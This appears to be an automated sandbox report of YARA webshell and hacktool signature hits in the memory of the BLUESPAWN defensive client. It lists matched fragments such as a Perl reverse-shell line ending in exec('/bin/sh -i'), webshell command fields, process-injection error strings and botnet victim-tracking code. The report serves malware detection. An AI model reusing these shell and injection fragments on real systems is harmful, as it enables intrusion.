- 0x36a6a1:$s5: zombie_array=array(
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_resolve | Webshells Auto-generated - file resolve.exe | Yara Bulk Rule Generator by Florian Roth | - 0x318e3d:$s0: 3^n6B(Ed3
- 0x36a774:$s0: 3^n6B(Ed3
- 0x318e53:$s1: ^uldn'Vt(x
- 0x36a780:$s1: ^uldn'Vt(x
- 0x318e6a:$s2: \= uPKfp
- 0x36a78d:$s2: \= uPKfp
- 0x318e7f:$s3: 'r.axV<ad
- 0x36a798:$s3: 'r.axV<ad
- 0x318e95:$s4: p,modoi$=sr(
- 0x36a7a4:$s4: p,modoi$=sr(
- 0x318eae:$s5: DiamondC8S t
- 0x36a7b3:$s5: DiamondC8S t
- 0x318ec7:$s6: `lQ9fX<ZvJW
- 0x36a7c2:$s6: `lQ9fX<ZvJW
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_RemExp | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x318ff0:$s1: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.Ser
- 0x36a87d:$s1: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.Ser
- 0x31904d:$s5: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=F
- 0x36a8d0:$s5: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=F
- 0x3190aa:$s6: <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></
- 0x36a923:$s6: <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_tool | Webshells Auto-generated - file tool.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319214:$s7: ""%windir%\\calc.exe"")
- 0x36aa1f:$s7: ""%windir%\\calc.exe"")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319358:$s0: window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp
- 0x36aaf5:$s0: window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp
- 0x3193b5:$s3: <input name="dbname" type="hidden" id="dbname" value="<%=request("dbname")%>">
- 0x36ab48:$s3: <input name="dbname" type="hidden" id="dbname" value="<%=request("dbname")%>">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | byloader | Webshells Auto-generated - file byloader.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31951f:$s0: SYSTEM\CurrentControlSet\Services\NtfsChk
- 0x36ac44:$s0: SYSTEM\CurrentControlSet\Services\NtfsChk
- 0x318313:$s1: Failure ... Access is Denied !
- 0x319555:$s1: Failure ... Access is Denied !
- 0x369ff6:$s1: Failure ... Access is Denied !
- 0x36ac70:$s1: Failure ... Access is Denied !
- 0x319580:$s2: NTFS Disk Driver Checking Service
- 0x36ac91:$s2: NTFS Disk Driver Checking Service
- 0x31833e:$s3: Dumping Description to Registry...
- 0x3195ae:$s3: Dumping Description to Registry...
- 0x36a017:$s3: Dumping Description to Registry...
- 0x36acb5:$s3: Dumping Description to Registry...
- 0x31836d:$s4: Opening Service .... Failure !
- 0x3195dd:$s4: Opening Service .... Failure !
- 0x36a03c:$s4: Opening Service .... Failure !
- 0x36acda:$s4: Opening Service .... Failure !
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_Fport | Webshells Auto-generated - file Fport.exe | Yara Bulk Rule Generator by Florian Roth | - 0x319725:$s4: Copyright 2000 by Foundstone, Inc.
- 0x36adb4:$s4: Copyright 2000 by Foundstone, Inc.
- 0x319754:$s5: You must have administrator privileges to run fport - exiting...
- 0x36add9:$s5: You must have administrator privileges to run fport - exiting...
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | BackDooR__fr_ | Webshells Auto-generated - file BackDooR (fr).php | Yara Bulk Rule Generator by Florian Roth | - 0x3198ba:$s3: print("<p align=\"center\"><font size=\"5\">Exploit include
- 0x36aed1:$s3: print("<p align=\"center\"><font size=\"5\">Exploit include
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_ntdaddy | Webshells Auto-generated - file ntdaddy.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319a16:$s1: <input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="s
- 0x36afbf:$s1: <input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="s
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | nstview_nstview | Webshells Auto-generated - file nstview.php | Yara Bulk Rule Generator by Florian Roth | - 0x319b85:$s4: open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
- 0x36b0c0:$s4: open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_upload | Webshells Auto-generated - file upload.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319cfb:$s0: PageUpload Below -->
- 0x36b1c8:$s0: PageUpload Below -->
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PasswordReminder | Webshells Auto-generated - file PasswordReminder.exe | Yara Bulk Rule Generator by Florian Roth | - 0x319e40:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
- 0x36b29f:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Pack_InjectT | Webshells Auto-generated - file InjectT.exe | Yara Bulk Rule Generator by Florian Roth | - 0x319fa0:$s3: ail To Open Registry
- 0x320088:$s3: ail To Open Registry
- 0x36b391:$s3: ail To Open Registry
- 0x36f580:$s3: ail To Open Registry
- 0x319fc1:$s4: 32fDssignim
- 0x36b3a8:$s4: 32fDssignim
- 0x319fd9:$s5: vide Internet S
- 0x36b3b6:$s5: vide Internet S
- 0x319ff5:$s6: d]Software\M
- 0x36b3c8:$s6: d]Software\M
- 0x31a00e:$s7: TInject.Dll
- 0x36b3d7:$s7: TInject.Dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_RemExp_2 | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31a139:$s2: Then Response.Write "
- 0x36b494:$s2: Then Response.Write "
- 0x31a15c:$s3: <a href= "<%=Request.ServerVariables("script_name")%>
- 0x36b4ad:$s3: <a href= "<%=Request.ServerVariables("script_name")%>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_c99 | Webshells Auto-generated - file c99.php | Yara Bulk Rule Generator by Florian Roth | - 0x31a2a9:$s2: "txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacce
- 0x36b58c:$s2: "txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacce
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rknt_zip_Folder_RkNT | Webshells Auto-generated - file RkNT.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31a40f:$s0: PathStripPathA
- 0x36b684:$s0: PathStripPathA
- 0x31a42a:$s1: `cLGet!Addr%
- 0x36b695:$s1: `cLGet!Addr%
- 0x3139b9:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x31a443:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x366d10:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x36b6a4:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x31a49e:$s3: oQToOemBuff* <=
- 0x36b6f5:$s3: oQToOemBuff* <=
- 0x31a4ba:$s4: ionCdunAsw[Us'
- 0x36b707:$s4: ionCdunAsw[Us'
- 0x31a4d5:$s6: CreateProcessW: %S
- 0x36b718:$s6: CreateProcessW: %S
- 0x31a4f4:$s7: ImageDirectoryEntryToData
- 0x36b72d:$s7: ImageDirectoryEntryToData
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | dbgntboot | Webshells Auto-generated - file dbgntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31a62b:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp
- 0x36b7f6:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp
- 0x31a688:$s3: sth junk the M$ Wind0wZ retur
- 0x36b849:$s3: sth junk the M$ Wind0wZ retur
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_shell | Webshells Auto-generated - file shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31a7bf:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz
- 0x36b912:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz
- 0x31a818:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
- 0x36b962:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hxdef100 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31a980:$s0: RtlAnsiStringToUnicodeString
- 0x36ba5c:$s0: RtlAnsiStringToUnicodeString
- 0x31a9a9:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x31aefe:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36ba7b:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36be18:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x31a9e0:$s9: \\.\mailslot\hxdef-rk100sABCDEFGH
- 0x36baa8:$s9: \\.\mailslot\hxdef-rk100sABCDEFGH
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rdrbs100 | Webshells Auto-generated - file rdrbs100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ab1d:$s3: Server address must be IP in A.B.C.D format.
- 0x36bb77:$s3: Server address must be IP in A.B.C.D format.
- 0x31ab56:$s4: mapped ports in the list. Currently
- 0x36bba6:$s4: mapped ports in the list. Currently
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ac9d:$s0: OpenProcess error!
- 0x36bc7f:$s0: OpenProcess error!
- 0x31acbc:$s1: WriteProcessMemory error!
- 0x36bc94:$s1: WriteProcessMemory error!
- 0x31ace2:$s4: GetProcAddress error!
- 0x36bcb0:$s4: GetProcAddress error!
- 0x31ad04:$s5: HHt`HHt\
- 0x36bcc8:$s5: HHt`HHt\
- 0x31ad19:$s6: Cmaudi0
- 0x36bcd3:$s6: Cmaudi0
- 0x31ad2d:$s7: CreateRemoteThread error!
- 0x36bcdd:$s7: CreateRemoteThread error!
- 0x180d8f:$s8: Kernel32
- 0x18105c:$s8: Kernel32
- 0x183347:$s8: Kernel32
- 0x1833d4:$s8: Kernel32
- 0x1a6322:$s8: Kernel32
- 0x1a657f:$s8: Kernel32
- 0x1fa147:$s8: Kernel32
- 0x1fac56:$s8: Kernel32
- 0x20a9f9:$s8: Kernel32
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hxdef100_2 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ae9b:$s0: \\.\mailslot\hxdef-rkc000
- 0x36bdc9:$s0: \\.\mailslot\hxdef-rkc000
- 0x31aec1:$s2: Shared Components\On Access Scanner\BehaviourBlo
- 0x36bde5:$s2: Shared Components\On Access Scanner\BehaviourBlo
- 0x31a9a9:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x31aefe:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36ba7b:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36be18:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Release_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31b04a:$s0: ;;;Y;`;d;h;l;p;t;x;|;
- 0x36bef6:$s0: ;;;Y;`;d;h;l;p;t;x;|;
- 0x31b06c:$s1: 0 0&00060K0R0X0f0l0q0w0
- 0x36bf0e:$s1: 0 0&00060K0R0X0f0l0q0w0
- 0x31b090:$s2: : :$:(:,:0:4:8:D:`=d=
- 0x36bf28:$s2: : :$:(:,:0:4:8:D:`=d=
- 0x31b0b2:$s3: 4@5P5T5\5T7\7d7l7t7|7
- 0x36bf40:$s3: 4@5P5T5\5T7\7d7l7t7|7
- 0x31b0d4:$s4: 1,121>1C1K1Q1X1^1e1k1s1y1
- 0x36bf58:$s4: 1,121>1C1K1Q1X1^1e1k1s1y1
- 0x31b0fa:$s5: 9 9$9(9,9P9X9\9`9d9h9l9p9t9x9|9
- 0x36bf74:$s5: 9 9$9(9,9P9X9\9`9d9h9l9p9t9x9|9
- 0x31b126:$s6: 0)0O0\0a0o0"1E1P1q1
- 0x36bf96:$s6: 0)0O0\0a0o0"1E1P1q1
- 0x31b146:$s7: <.<I<d<h<l<p<t<x<|<
- 0x36bfac:$s7: <.<I<d<h<l<p<t<x<|<
- 0x31b166:$s8: 3&31383>3F3Q3X3`3f3w3|3
- 0x36bfc2:$s8: 3&31383>3F3Q3X3`3f3w3|3
- 0x31b18a:$s9: 8@;D;H;L;P;T;X;\;a;9=W=z=
- 0x36bfdc:$s9: 8@;D;H;L;P;T;X;\;a;9=W=z=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webadmin | Webshells Auto-generated - file webadmin.php | Yara Bulk Rule Generator by Florian Roth | - 0x31b2bf:$s0: <input name=\"editfilename\" type=\"text\" class=\"style1\" value='".$this->inpu
- 0x36c0a3:$s0: <input name=\"editfilename\" type=\"text\" class=\"style1\" value='".$this->inpu
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | commands | Webshells Auto-generated - file commands.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31b42b:$s1: If CheckRecord("SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = " & VictimID
- 0x36c1a1:$s1: If CheckRecord("SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = " & VictimID
- 0x31b488:$s2: proxyArr = Array ("HTTP_X_FORWARDED_FOR","HTTP_VIA","HTTP_CACHE_CONTROL","HTTP_F
- 0x36c1f4:$s2: proxyArr = Array ("HTTP_X_FORWARDED_FOR","HTTP_VIA","HTTP_CACHE_CONTROL","HTTP_F
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hkdoordll | Webshells Auto-generated - file hkdoordll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31b5f6:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
- 0x36c2f4:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | r57shell_2 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31b764:$s2: echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
- 0x36c3f4:$s2: echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_v1_45_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31b8dc:$s3: syspath
- 0x36c4fe:$s3: syspath
- 0x316d35:$s4: \Mithril
- 0x31b8f0:$s4: \Mithril
- 0x31be98:$s4: \Mithril
- 0x3690ce:$s4: \Mithril
- 0x36c508:$s4: \Mithril
- 0x36c8da:$s4: \Mithril
- 0x31b905:$s5: --list the services in the computer
- 0x31d8ec:$s5: --list the services in the computer
- 0x36c513:$s5: --list the services in the computer
- 0x36dab4:$s5: --list the services in the computer
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | dbgiis6cli | Webshells Auto-generated - file dbgiis6cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ba48:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- 0x36c5e8:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- 0x31ba94:$s5: ###command:(NO more than 100 bytes!)
- 0x36c62a:$s5: ###command:(NO more than 100 bytes!)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | remview_2003_04_22 | Webshells Auto-generated - file remview_2003_04_22.php | Yara Bulk Rule Generator by Florian Roth | - 0x31bbe8:$s1: "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\"
- 0x36c710:$s1: "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_test | Webshells Auto-generated - file test.php | Yara Bulk Rule Generator by Florian Roth | - 0x2fb321:$s0: $yazi = "test" . "\r\n";
- 0x31bd41:$s0: $yazi = "test" . "\r\n";
- 0x354e01:$s0: $yazi = "test" . "\r\n";
- 0x36c7fb:$s0: $yazi = "test" . "\r\n";
- 0x2fb346:$s2: fwrite ($fp, "$yazi");
- 0x31bd66:$s2: fwrite ($fp, "$yazi");
- 0x354e1c:$s2: fwrite ($fp, "$yazi");
- 0x36c816:$s2: fwrite ($fp, "$yazi");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Debug_cress | Webshells Auto-generated - file cress.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31be98:$s0: \Mithril
- 0x36c8da:$s0: \Mithril
- 0x316c58:$s4: Mithril.exe
- 0x31abdc:$s4: Mithril.exe
- 0x31beae:$s4: Mithril.exe
- 0x369042:$s4: Mithril.exe
- 0x36bc05:$s4: Mithril.exe
- 0x36c8e6:$s4: Mithril.exe
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_EFSO_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c14a:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31f1a8:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36ca7e:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36eb8c:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31c1a7:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x31f205:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36cad1:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36ebdf:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | thelast_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x31c317:$s5: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"Your Name\" field is r
- 0x36cbd3:$s5: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"Your Name\" field is r
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | adjustcr | Webshells Auto-generated - file adjustcr.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316628:$s0: $Info: This file is packed with the UPX executable packer $
- 0x31c483:$s0: $Info: This file is packed with the UPX executable packer $
- 0x368bc9:$s0: $Info: This file is packed with the UPX executable packer $
- 0x36ccd1:$s0: $Info: This file is packed with the UPX executable packer $
- 0x31c4cb:$s2: $License: NRV for UPX is distributed under special license $
- 0x36cd0f:$s2: $License: NRV for UPX is distributed under special license $
- 0x31c514:$s6: AdjustCR Carr
- 0x36cd4e:$s6: AdjustCR Carr
- 0x31668d:$s7: ION\System\FloatingPo
- 0x31c52e:$s7: ION\System\FloatingPo
- 0x368c1a:$s7: ION\System\FloatingPo
- 0x36cd5e:$s7: ION\System\FloatingPo
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_xIShell | Webshells Auto-generated - file xIShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31c676:$s3: if (!$nix) { $xid = implode(explode("\\",$xid),"\\\\");}echo ("<td><a href='Java
- 0x36ce38:$s3: if (!$nix) { $xid = implode(explode("\\",$xid),"\\\\");}echo ("<td><a href='Java
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_AppPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c7e8:$s6: " onclick="this.form.sqlStr.value='e:\hytop.mdb
- 0x36cf3c:$s6: " onclick="this.form.sqlStr.value='e:\hytop.mdb
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell | Webshells Auto-generated - file xssshell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c933:$s1: if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), "pushComma
- 0x36d019:$s1: if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), "pushComma
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_usr | Webshells Auto-generated - file usr.php | Yara Bulk Rule Generator by Florian Roth | - 0x31caae:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
- 0x36d126:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phpinj | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x3071fd:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x31cc1c:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x35d98d:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x36d226:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell_db | Webshells Auto-generated - file db.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31cd73:$s8: '// By Ferruh Mavituna | http://ferruh.mavituna.com
- 0x36d30f:$s8: '// By Ferruh Mavituna | http://ferruh.mavituna.com
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_sh | Webshells Auto-generated - file sh.php | Yara Bulk Rule Generator by Florian Roth | - 0x31ceba:$s1: "@$SERVER_NAME ".exec("pwd")
- 0x36d3e8:$s1: "@$SERVER_NAME ".exec("pwd")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell_default | Webshells Auto-generated - file default.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31cff9:$s3: If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
- 0x36d4b9:$s3: If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EditServer_Webshell_2 | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31d16b:$s0: @HOTMAIL.COM
- 0x36d5bd:$s0: @HOTMAIL.COM
- 0x31d184:$s1: Press Any Ke
- 0x36d5cc:$s1: Press Any Ke
- 0x31d19d:$s3: glish MenuZ
- 0x36d5db:$s3: glish MenuZ
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | by064cli | Webshells Auto-generated - file by064cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31d2c4:$s7: packet dropped,redirecting
- 0x36d694:$s7: packet dropped,redirecting
- 0x31d2eb:$s9: input the password(the default one is 'by')
- 0x36d6b1:$s9: input the password(the default one is 'by')
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31d438:$s0: please enter the password:
- 0x36d790:$s0: please enter the password:
- 0x31d45f:$s3: \dllTest.pdb
- 0x31d8d3:$s3: \dllTest.pdb
- 0x36d7ad:$s3: \dllTest.pdb
- 0x36daa5:$s3: \dllTest.pdb
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | peek_a_boo | Webshells Auto-generated - file peek-a-boo.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31d58b:$s0: __vbaHresultCheckObj
- 0x36d86b:$s0: __vbaHresultCheckObj
- 0x31d5ac:$s1: \VB\VB5.OLB
- 0x36d882:$s1: \VB\VB5.OLB
- 0x31d5c4:$s2: capGetDriverDescriptionA
- 0x36d890:$s2: capGetDriverDescriptionA
- 0x317e70:$s3: __vbaExceptHandler
- 0x31d5e9:$s3: __vbaExceptHandler
- 0x369cd9:$s3: __vbaExceptHandler
- 0x36d8ab:$s3: __vbaExceptHandler
- 0x317e8f:$s4: EVENT_SINK_Release
- 0x31d608:$s4: EVENT_SINK_Release
- 0x369cee:$s4: EVENT_SINK_Release
- 0x36d8c0:$s4: EVENT_SINK_Release
- 0x31d627:$s8: __vbaErrorOverflow
- 0x36d8d5:$s8: __vbaErrorOverflow
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | fmlibraryv3 | Webshells Auto-generated - file fmlibraryv3.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31d75b:$s3: ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER
- 0x36d99b:$s3: ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Debug_dllTest_2 | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31d8cd:$s4: \Debug\dllTest.pdb
- 0x36da9f:$s4: \Debug\dllTest.pdb
- 0x31b905:$s5: --list the services in the computer
- 0x31d8ec:$s5: --list the services in the computer
- 0x36c513:$s5: --list the services in the computer
- 0x36dab4:$s5: --list the services in the computer
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | connector | Webshells Auto-generated - file connector.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31da2d:$s2: If ( AttackID = BROADCAST_ATTACK )
- 0x36db87:$s2: If ( AttackID = BROADCAST_ATTACK )
- 0x31da5c:$s4: Add UNIQUE ID for victims / zombies
- 0x36dbac:$s4: Add UNIQUE ID for victims / zombies
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_HideRun | Webshells Auto-generated - file HideRun.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31dbad:$s0: Usage -- hiderun [AppName]
- 0x36dc8f:$s0: Usage -- hiderun [AppName]
- 0x31dbd4:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
- 0x36dcac:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Shell_v1_7 | Webshells Auto-generated - file PHP_Shell_v1.7.php | Yara Bulk Rule Generator by Florian Roth | - 0x2f7d76:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x31dd24:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x35252e:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x36dd8e:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell_save | Webshells Auto-generated - file save.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31de71:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
- 0x36de6d:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
- 0x31decd:$s5: VictimID = fm_NStr(Victims(i))
- 0x36debf:$s5: VictimID = fm_NStr(Victims(i))
|
